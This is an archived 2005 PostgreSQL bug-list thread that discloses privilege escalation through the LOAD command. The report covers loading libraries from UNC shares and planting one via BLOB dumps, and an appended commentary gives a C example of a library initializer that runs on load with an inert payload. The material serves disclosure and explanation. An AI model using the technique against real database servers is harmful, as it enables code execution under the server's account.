_init() is the equivalent of DllMain on Linux/etc; in fact the other database server I was looking at is vulnerable to this exact problem. If postgresql accepts CLOB/BLOB input from a client to a table and then can dump to disk you might be able to achieve it that way - which is how I did it on the other rdbms.
Cheers,
David
----- Original Message ----- From: "John Heasman" <[EMAIL PROTECTED]>
To: <pgsql-bugs@postgresql.org>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, January 21, 2005 7:08 PM
Subject: Privilege escalation via LOAD
Hi guys,
It appears that low privileged users can invoke the LOAD extension to load arbitrary libraries into the postgres process space. On Windows systems this is achieved by calling LoadLibrary (src/backend/port/dynloader/win32.c). The effect of this is that DllMain will be executed. Since LOAD takes an absolute path, UNC paths may be used on Windows, thus a low privileged database user can load an arbitrary library from an anonymous share they have set up, escalating to the privileges of the database user. I am still investigating the impact on Unix.
Cheers
John
(this vulnerability was born out of a discussion on #postgresql between myself, lurka and dennisb).
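To make the mechanism John describes concrete: a library's initializer (DllMain on Windows, _init or a constructor function on ELF systems) runs the moment the loader maps the library, before any symbol in it is ever called, so LOAD alone is enough to run attacker code inside the backend. The following is an added illustration, not code from this thread or from PostgreSQL; the file name, build line and SQL statement in the comments are hypothetical.

```c
/* Added example (not from the mailing-list thread): a minimal shared library
 * whose initializer runs at load time, with no exported function being called.
 * Modern toolchains use __attribute__((constructor)) rather than defining
 * _init directly (the C runtime already provides _init via crti.o).
 *
 * Build and load (paths hypothetical):
 *   gcc -shared -fPIC -o /tmp/hello_load.so hello_load.c
 *   psql -c "LOAD '/tmp/hello_load.so';"
 * Since LOAD takes an absolute path, the same trick works with a Windows UNC
 * path, as the report notes.
 */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

static int   g_init_ran    = 0;   /* set by the load-time initializer */
static uid_t g_uid_at_init = 0;   /* effective uid the initializer ran as */

/* Executed by the dynamic loader as soon as the library is mapped. In a
 * backend that just ran LOAD, this body runs with the privileges of the
 * postgres server process, not those of the database user who issued it. */
__attribute__((constructor))
static void on_load(void)
{
    g_init_ran    = 1;
    g_uid_at_init = geteuid();
    /* A real payload would do its work here; this one only records state. */
}

/* Accessors so a caller (or a test) can confirm the initializer already ran. */
int   init_ran(void)    { return g_init_ran; }
uid_t uid_at_init(void) { return g_uid_at_init; }

/* Stand-alone check: when built as an executable, the constructor has already
 * run by the time main starts, mirroring what happens on LOAD. */
int main(void)
{
    printf("initializer ran before main: %s (euid %ld)\n",
           init_ran() ? "yes" : "no", (long)uid_at_init());
    return init_ran() ? 0 : 1;
}
```

The check a practitioner wants from this is the last line of the comment in on_load: nothing the library exports needs to be invoked, so any control over the path passed to LOAD is code execution as the server account. Later PostgreSQL releases restrict LOAD accordingly (superuser only, with non-superusers limited to libraries under $libdir/plugins).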